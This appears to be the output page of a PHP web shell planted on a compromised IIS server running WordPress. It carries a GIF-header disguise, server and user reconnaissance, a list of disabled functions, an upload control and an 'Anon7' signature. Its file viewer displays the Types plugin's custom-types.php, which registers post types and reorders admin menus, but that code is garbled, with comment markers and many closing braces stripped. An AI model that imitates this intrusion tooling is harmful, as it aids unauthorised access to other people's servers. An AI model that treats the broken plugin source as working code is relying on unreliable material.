GIF89A; .
Server : Microsoft-IIS/10.0
System : Windows NT HMW9050 6.2 build 9200 (Unknow Windows version Standard Edition) i586
User : fatorc ( 0)
PHP Version : 5.3.28
Disable Function : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell_exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, link, openlog, apache_child_terminate
Directory :  e:/home/fatorc/Web/wp-content/plugins/types/library/toolset/types/embedded/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Current File : e:/home/fatorc/Web/wp-content/plugins/types/library/toolset/types/embedded/includes/custom-types.php
 * Post Types embedded code.
add_action( 'wpcf_type', 'wpcf_filter_type', 10, 2 );

 * Returns default custom type structure.
 * @return array
function wpcf_custom_types_default() {
    return array(
        'labels' => array(
            'name' => '',
            'singular_name' => '',
            'add_new' => 'Add New',
            'add_new_item' => 'Add New %s',
//          'edit' => 'Edit',
            'edit_item' => 'Edit %s',
            'new_item' => 'New %s',
//          'view' => 'View',
            'view_item' => 'View %s',
            'search_items' => 'Search %s',
            'not_found' => 'No %s found',
            'not_found_in_trash' => 'No %s found in Trash',
            'parent_item_colon' => 'Parent %s',
            'menu_name' => '%s',
            'all_items' => '%s',
        'slug' => '',
        'description' => '',
        'public' => true,
        'capabilities' => false,
        'menu_position' => null,
        'menu_icon' => '',
        'taxonomies' => array(
            'category' => false,
            'post_tag' => false,
        'supports' => array(
            'title' => true,
            'editor' => true,
            'trackbacks' => false,
            'comments' => false,
            'revisions' => false,
            'author' => false,
            'excerpt' => false,
            'thumbnail' => false,
            'custom-fields' => false,
            'page-attributes' => false,
            'post-formats' => false,
        'rewrite' => array(
            'enabled' => true,
            'slug' => '',
            'with_front' => true,
            'feeds' => true,
            'pages' => true,
        'has_archive' => true,
        'show_ui' => true,
        'show_in_menu' => true,
        'show_in_menu_page' => '',
        'publicly_queryable' => true,
        'exclude_from_search' => false,
        'hierarchical' => false,
        'query_var_enabled' => true,
        'query_var' => '',
        'can_export' => true,
        'show_rest' => false,
        'rest_base' => '',
        'show_in_nav_menus' => true,
        'register_meta_box_cb' => '',
        'permalink_epmask' => 'EP_PERMALINK',
        'update' => false,

 * Inits custom types.
function wpcf_custom_types_init() {
    $custom_types = get_option( WPCF_OPTION_NAME_CUSTOM_TYPES, array() );
    if ( !empty( $custom_types ) ) {
        foreach ( $custom_types as $post_type => $data ) {
            if ( empty($data) ) {
            if (
                ( isset($data['_builtin']) && $data['_builtin'] )
                || wpcf_is_builtin_post_types($post_type)
            ) {
            wpcf_custom_types_register( $post_type, $data );

    // rearrange menu items
    add_filter( 'custom_menu_order' , '__return_true');
    add_filter( 'menu_order', 'types_menu_order' );
    // rearrange menu items - end

    /** This filter is documented in wp-admin/wp-admin/edit-form-advanced.php */
    add_filter('enter_title_here', 'wpcf_filter_enter_title_here', 10, 2);

function types_menu_order( $menu ) {
	$custom_types = get_option( WPCF_OPTION_NAME_CUSTOM_TYPES, array() );

	if ( !empty( $custom_types ) ) {
		foreach( $custom_types as $post_type => $data ) {
			if( empty( $data )
                || !isset( $data['menu_position'] )
				|| strpos( $data['menu_position'],'--wpcf-add-menu-after--' ) === false )

			// at this point we have not only an integer as menu position
			$target_url = explode( '--wpcf-add-menu-after--', $data['menu_position'] );

			if( !isset( $target_url[1] ) || empty( $target_url[1] ) )

            $target_url = $target_url[1];

            // current url
            switch( $data['slug'] ) {
                case 'post':
                    $current_url = 'edit.php';
                case 'attachment':
                    $current_url = 'upload.php';
                    $current_url = 'edit.php?post_type=' . $data['slug'];

            types_menu_order_item_sort( $menu, $current_url, $target_url );

            // store already reordered items
            $reordered[$target_url][] = array(
                'current_url' => $current_url,
                'menu_position' => $target_url

            // sort previous sorted items which depend on current again
            if( isset( $reordered[$current_url] ) ) {
                foreach( $reordered[$current_url] as $post_type ) {
                    types_menu_order_item_sort( $menu, $post_type['current_url'], $post_type['menu_position'] );

                unset( $reordered[$current_url] );

	return $menu;

 * @param $menu
 * @param $data
 * @param $menu_position
 * @return mixed
function types_menu_order_item_sort( &$menu, $current_url, $target_url ) {

    // current index
    $current_index = array_search( $current_url, $menu );

    // remove all items of $menu which are not matching selected menu
    $menu_filtered = array_keys( $menu, $target_url );

    // use last match for resorting
    $add_menu_after_index = array_pop( $menu_filtered );

    // if both found resort menu
    if( $current_index && $add_menu_after_index )
        wpcf_custom_types_menu_order_move( $menu, $current_index, $add_menu_after_index );return $menu;

 * This function is be used to rearrange the admin menu order
 * @param $menu
 * @param $item_move The item index which should be moved
 * @param $item_target The item index where $item_move should be placed after
function wpcf_custom_types_menu_order_move( &$menu, $item_move, $item_target ) {

    // if item move comes after target we have to select the next element,
    // otherwise the $item_move would be added before the target.
    if( $item_move > $item_target )

    // if $item_target is the last menu item, place $item_move to the end of the array
    if( !isset( $menu[$item_target]) ) {
        $tmp_menu_item = $menu[$item_move];
        unset( $menu[$item_move] );
        $menu[] = $tmp_menu_item;

    // $item_target is not the last menu, place $item_move after it
    } else {
        $cut_moving_element = array_splice( $menu, $item_move, 1 );
        array_splice( $menu, $item_target, 0, $cut_moving_element );


 * Registers post type.
 * @param type $post_type
 * @param type $data 
function wpcf_custom_types_register( $post_type, $data ) {

    global $wpcf;

    if ( !empty( $data['disabled'] ) ) {
        return false;
    $data = apply_filters( 'types_post_type', $data, $post_type );
    // Set labels
    if ( !empty( $data['labels'] ) ) {
        if ( !isset( $data['labels']['name'] ) ) {
            $data['labels']['name'] = $post_type;
        if ( !isset( $data['labels']['singular_name'] ) ) {
            $data['labels']['singular_name'] = $data['labels']['name'];
        foreach ( $data['labels'] as $label_key => $label ) {
            $data['labels'][$label_key] = $label = stripslashes( $label );
            switch ( $label_key ) {
                case 'add_new_item':
                case 'edit_item':
                case 'new_item':
                case 'view_item':
                case 'parent_item_colon':
                    $data['labels'][$label_key] = sprintf( $label,
                            $data['labels']['singular_name'] );

                case 'search_items':
                case 'all_items':
                case 'not_found':
                case 'not_found_in_trash':
                case 'menu_name':
                    $data['labels'][$label_key] = sprintf( $label,
                            $data['labels']['name'] );
    $data['description'] = !empty( $data['description'] ) ? htmlspecialchars( stripslashes( $data['description'] ),
                    ENT_QUOTES ) : '';
    $data['public'] = (empty( $data['public'] ) || strval( $data['public'] ) == 'hidden') ? false : true;
    $data['publicly_queryable'] = !empty( $data['publicly_queryable'] );
    $data['exclude_from_search'] = !empty( $data['exclude_from_search'] );
    $data['show_ui'] = (empty( $data['show_ui'] ) || !$data['public']) ? false : true;
    if ( empty( $data['menu_position'] ) ) {
        unset( $data['menu_position'] );
    } else {
        $data['menu_position'] = intval( $data['menu_position'] );
    $data['hierarchical'] = !empty( $data['hierarchical'] );
    $data['supports'] = !empty( $data['supports'] ) && is_array( $data['supports'] ) ? array_keys( $data['supports'] ) : array();
    $data['taxonomies'] = !empty( $data['taxonomies'] ) && is_array( $data['taxonomies'] ) ? array_keys( $data['taxonomies'] ) : array();
    $data['has_archive'] = !empty( $data['has_archive'] );
    $data['can_export'] = !empty( $data['can_export'] );
    $data['show_in_rest'] = !empty( $data['show_in_rest'] );
    $data['rest_base'] = !empty( $data['rest_base'] ) ? $data['rest_base'] : $post_type;
    $data['show_in_nav_menus'] = !empty( $data['show_in_nav_menus'] );
    $data['show_in_menu'] = !empty( $data['show_in_menu'] );
    if ( empty( $data['query_var_enabled'] ) ) {
        $data['query_var'] = false;
    } else if ( empty( $data['query_var'] ) ) {
        $data['query_var'] = true;
    if ( !empty( $data['show_in_menu_page'] ) ) {
        $data['show_in_menu'] = $data['show_in_menu_page'];
        $data['labels']['all_items'] = $data['labels']['name'];
     * menu_icon
    if ( empty( $data['menu_icon'] ) ) {
        unset( $data['menu_icon'] );
    } else {
        $data['menu_icon'] = stripslashes( $data['menu_icon'] );
        if ( strpos( $data['menu_icon'], '[theme]' ) !== false ) {
            $data['menu_icon'] = str_replace( '[theme]',
                    get_stylesheet_directory_uri(), $data['menu_icon'] );
    if ( empty($data['menu_icon'] ) && !empty( $data['icon'] ) ) {
        $data['menu_icon'] = sprintf( 'dashicons-%s', $data['icon'] );
     * rewrite
    if ( !empty( $data['rewrite']['enabled'] ) ) {
        $data['rewrite']['with_front'] = !empty( $data['rewrite']['with_front'] );
        $data['rewrite']['feeds'] = !empty( $data['rewrite']['feeds'] );
        $data['rewrite']['pages'] = !empty( $data['rewrite']['pages'] );
        if ( !empty( $data['rewrite']['custom'] ) && $data['rewrite']['custom'] != 'custom' ) {
            unset( $data['rewrite']['slug'] );
        unset( $data['rewrite']['custom'] );
    } else {
        $data['rewrite'] = false;

    // Set permalink_epmask
    if ( !empty( $data['permalink_epmask'] ) ) {
        $data['permalink_epmask'] = constant( $data['permalink_epmask'] );

     * set default support options
    $support_fields = array(
        'editor' => false,
        'author' => false,
        'thumbnail' => false,
        'excerpt' => false,
        'trackbacks' => false,
        'custom-fields' => false,
        'comments' => false,
        'revisions' => false,
        'page-attributes' => false,
        'post-formats' => false,
    $data['supports'] = array_merge_recursive( $data['supports'], $support_fields );

     * custom slug for has_archive
    if (
        && $data['has_archive']
        && isset($data['has_archive_slug'])
        && $data['has_archive_slug']
    ) {
        $data['has_archive'] = $data['has_archive_slug'];

     * check menu icon
    if ( isset($data['menu_icon']) && empty($data['menu_icon']) ) {

	// do not handle taxonomy assignments if we have customised taxonomies stored
	$stored_taxonomies = get_option( WPCF_OPTION_NAME_CUSTOM_TAXONOMIES, array() );
	if( isset( $data['taxonomies'] ) && !empty( $stored_taxonomies ) ) {

		// Because of the types-676 bug, we're going to make an extra check and fix the problem.
		// It costs us some performance but we can consider this a temporary fix. This bug has affected
		// mainly users who update regularly, so we can afford to remove it after few versions.

		// Important note here is that $data['taxonomies'] keeps being updated, so we're not risking any data loss.
		$legacy_taxonomy_list = $data['taxonomies'];

		// Compile a list of taxonomy slugs from the new data source (taxonomy definitions)
		$current_taxonomy_list = array();
		foreach( $stored_taxonomies as $stored_taxonomy_slug => $stored_taxonomy ) {
			if( isset( $stored_taxonomy['supports'] )
				&& is_array( $stored_taxonomy['supports'] )
				&& in_array( $post_type, array_keys( $stored_taxonomy['supports'] ) )
			) {
				$current_taxonomy_list[] = $stored_taxonomy['slug'];

		// If $current_taxonomy_list is a subset of $legacy_taxonomy_list, it is an indication of buggy update
		// routine in Types 1.9 or 1.9.1.
		$is_failed_update = ( array_intersect( $current_taxonomy_list, $legacy_taxonomy_list ) == $current_taxonomy_list );
		if( $is_failed_update ) {

			// Mirror assignments from the "legacy" source
			foreach( $legacy_taxonomy_list as $missed_taxonomy_slug ) {
				if( isset( $stored_taxonomies[ $missed_taxonomy_slug ] ) ) {
					$stored_taxonomies[ $missed_taxonomy_slug ][ 'supports' ][ $post_type ] = 1;;

			update_option( WPCF_OPTION_NAME_CUSTOM_TAXONOMIES, $stored_taxonomies );

		// Still unset the legacy data to avoid double assignment
		unset( $data['taxonomies'] );

    $args = register_post_type( $post_type, apply_filters( 'wpcf_type', $data, $post_type ) );

    do_action( 'wpcf_type_registered', $args );

 * Revised rewrite.
 * We force slugs now. Submitted and sanitized slug. Set slugs localized (WPML).
 * More solid way to force WP slugs.
 * @see
 * @since
 * @param type $data
 * @param type $post_type
 * @return boolean 
function wpcf_filter_type( $data, $post_type ) {
    if ( !empty( $data['rewrite']['enabled'] ) ) {
        $data['rewrite']['with_front'] = !empty( $data['rewrite']['with_front'] );
        $data['rewrite']['feeds'] = !empty( $data['rewrite']['feeds'] );
        $data['rewrite']['pages'] = !empty( $data['rewrite']['pages'] );

        // If slug is not submitted use default slug
        if ( empty( $data['rewrite']['slug'] ) ) {
            $data['rewrite']['slug'] = $data['slug'];

        // Also force default slug if rewrite mode is 'normal'
        if ( !empty( $data['rewrite']['custom'] ) && $data['rewrite']['custom'] != 'normal' ) {
            $data['rewrite']['slug'] = $data['rewrite']['slug'];

        // Register with _x()
        $data['rewrite']['slug'] = _x( $data['rewrite']['slug'], 'URL slug',
                'wpcf' );
        // CHANGED leave it for reference if we need
        // to return handling slugs back to WP.
        // We unset slug settings and leave WP to handle it himself.
        // Let WP decide what slugs should be!
//        if (!empty($data['rewrite']['custom']) && $data['rewrite']['custom'] != 'normal') {
//            unset($data['rewrite']['slug']);
//        }
        // Just discard non-WP property
        unset( $data['rewrite']['custom'] );
    } else {
        $data['rewrite'] = false;

    return $data;

 * Returns active post types.
 * @return type 
function wpcf_get_active_custom_types() {
    $types = get_option(WPCF_OPTION_NAME_CUSTOM_TYPES, array());
    foreach ($types as $type => $data) {
        if (!empty($data['disabled'])) {
    return $types;

/** This action is documented in wp-admin/includes/table.php */
add_filter('dashboard_glance_items', 'wpcf_dashboard_glance_items');

 * Add CPT info to "At a Glance"
 * Add to "At a Glance" WordPress admin dashboard widget information
 * about number of posts.
 * @since 1.6.6
function wpcf_dashboard_glance_items($elements)
    // remove when is fixed
    wp_register_style( 'wpcf-fix-wordpress-core', WPCF_EMBEDDED_RES_RELPATH . '/css/fix-wordpress-core.css', array(), WPCF_VERSION );
    wp_enqueue_style( 'wpcf-fix-wordpress-core' );

    $custom_types = get_option( WPCF_OPTION_NAME_CUSTOM_TYPES, array() );
    if ( empty( $custom_types ) ) {
        return $elements;
    foreach ( $custom_types as $post_type => $data ) {
        if ( !isset($data['dashboard_glance']) || !$data['dashboard_glance'] || $post_type == 'post' || $post_type == 'page' ) {
        if ( isset($data['disabled']) && $data['disabled'] ) {

        if( $post_type == 'attachment' )
            $data['icon'] = 'admin-media';

        $num_posts = wp_count_posts($post_type);

        $num = $post_type == 'attachment'
            ? number_format_i18n($num_posts->inherit)
            : number_format_i18n($num_posts->publish);

        $text = _n( $data['labels']['singular_name'], $data['labels']['name'], intval($num_posts->publish) );
        $elements[] = sprintf(
            '<a href="%s"%s>%s %s</a>',
                        'post_type' => $post_type,
            isset($data['icon'])? sprintf('class="dashicons-%s"', $data['icon']):'',
    return $elements;

 * Summary.
 * Description.
 * @since x.x.x
 * @access (for functions: only use if private)
 * @see Function/method/class relied on
 * @link URL
 * @global type $varname Description.
 * @global type $varname Description.
 * @param type $var Description.
 * @param type $var Optional. Description.
 * @return type Description.
function wpcf_filter_enter_title_here($enter_title_here, $post)
    if ( is_object($post) && isset( $post->post_type) ) {
        $custom_types = get_option( WPCF_OPTION_NAME_CUSTOM_TYPES, array() );
        if (
            && isset($custom_types[$post->post_type])
            && isset($custom_types[$post->post_type]['labels'])
            && isset($custom_types[$post->post_type]['labels']['enter_title_here'])
        ) {
            $enter_title_here = trim($custom_types[$post->post_type]['labels']['enter_title_here']);
    if ( empty($enter_title_here) ) {
        $enter_title_here = __('Enter title here', 'wpcf');
    return $enter_title_here;

 * Function to search sub array and returning $array key
 * @since 1.9
 * @param array $array
 * @param string $search
 * @return bool|int|string
function types_get_array_key_search_in_sub( $array, $search ) {
    foreach( $array as $key => $sub_array ) {
        if( in_array( $search, $sub_array ) )
            return $key;

    return false;

 * Change names of build-in post types in menu
 * @since 1.9
function types_rename_build_in_post_types_menu() {

    $custom_types = get_option( WPCF_OPTION_NAME_CUSTOM_TYPES, array() );

    if ( !empty( $custom_types ) ) {
        global $menu, $submenu;

        foreach( $custom_types as $post_type => $data ) {
                isset( $data['_builtin'] )
                && $data['_builtin']
                && isset( $data['slug'] )
                && isset( $data['labels']['name'] )
            ) {
                // post
                if( $data['slug'] == 'post' ) {
                    $post_edit_page = 'edit.php';
                    $post_new_page  = 'post-new.php';
                // page
                } elseif( $data['slug'] == 'page' ) {
                    $post_edit_page = 'edit.php?post_type=page';
                    $post_new_page  = 'post-new.php?post_type=page';
                // attachment (Media)
                } elseif( $data['slug'] == 'attachment' ) {
                    $post_edit_page = 'upload.php';
                    $post_new_page  = 'media-new.php';
                // abort
                } else {

                $post_menu_key = false;

                // find menu key
                $post_menu_key = types_get_array_key_search_in_sub( $menu, $post_edit_page );

                if( !$post_menu_key )

                // change menu name
                $menu[$post_menu_key][0] = $data['labels']['name'];

                if( isset( $submenu[$post_edit_page] ) && $post_edit_page != 'upload.php' ) {
                    $submenu_overview_key = $submenu_new_key = false;

                    // post/page rename overview
                    $submenu_overview_key = types_get_array_key_search_in_sub( $submenu[$post_edit_page], $post_edit_page );

                    if( $submenu_overview_key )
                        $submenu[$post_edit_page][$submenu_overview_key][0] = $data['labels']['name'];

                    // post/page rename add new
                    $submenu_new_key = types_get_array_key_search_in_sub( $submenu[$post_edit_page], $post_new_page );

                    if( $submenu_new_key )
                        $submenu[$post_edit_page][$submenu_new_key][0] = isset( $data['labels']['singular_name'] )
                            ? 'Add ' . $data['labels']['singular_name']
                            : 'Add ' . $data['labels']['name'];


add_action( 'admin_menu', 'types_rename_build_in_post_types_menu' );

 * Change labels of build-in post types
 * @since 1.9
function types_rename_build_in_post_types() {
    global $wp_post_types;
    $custom_types = get_option( WPCF_OPTION_NAME_CUSTOM_TYPES, array() );

    if ( !empty( $custom_types ) ) {
        foreach ( $custom_types as $post_type => $data ) {
            // only for build_in
            if (
                isset( $data['_builtin'] )
                && $data['_builtin']
                && isset( $data['slug'] )
                && isset( $data['labels']['name'] )
            ) {
                // check if slug (post/page) exists
                if( isset( $wp_post_types[$data['slug']] ) ) {
                    // refer $l to post labels
                    $l = &$wp_post_types[$data['slug']]->labels;

                    // change name
                    $l->name = isset( $data['labels']['name'] ) ? $data['labels']['name'] : $l->name;

                    // change singular name
                    $l->singular_name = isset( $data['labels']['singular_name'] ) ? $data['labels']['singular_name'] : $l->singular_name;

                    // change labels
                    $l->add_new_item = 'Add New';
                    $l->add_new = 'Add New ' . $l->singular_name;
                    $l->edit_item = 'Edit ' . $l->singular_name;
                    $l->new_item = 'New ' . $l->name ;
                    $l->view_item = 'View ' . $l->name;
                    $l->search_items = 'Search '. $l->name;
                    $l->not_found = 'No ' . $l->name . ' found';
                    $l->not_found_in_trash = 'No ' . $l->name . ' found in Trash';
                    $l->parent_item_colon = 'Parent '. $l->name;
                    $l->all_items = 'All ' . $l->name;
                    $l->menu_name = $l->name;
                    $l->name_admin_bar = $l->name;


add_action( 'init', 'types_rename_build_in_post_types' );

 * Visibility of inbuild types
function types_visibility_build_in_types() {
    $custom_types = get_option( WPCF_OPTION_NAME_CUSTOM_TYPES, array() );

    // Type: Posts
    if( isset( $custom_types['post']['public'] )
        && $custom_types['post']['public'] == 'hidden' )
        remove_menu_page( 'edit.php' );

    // Type: Pages
    if( isset( $custom_types['page']['public'] )
        && $custom_types['page']['public'] == 'hidden' )
        remove_menu_page( 'edit.php?post_type=page' );

    // Type: Media
    if( isset( $custom_types['attachment']['public'] )
        && $custom_types['attachment']['public'] == 'hidden' )
        remove_menu_page( 'upload.php' );

add_action( 'admin_menu', 'types_visibility_build_in_types' );

Anon7 - 2021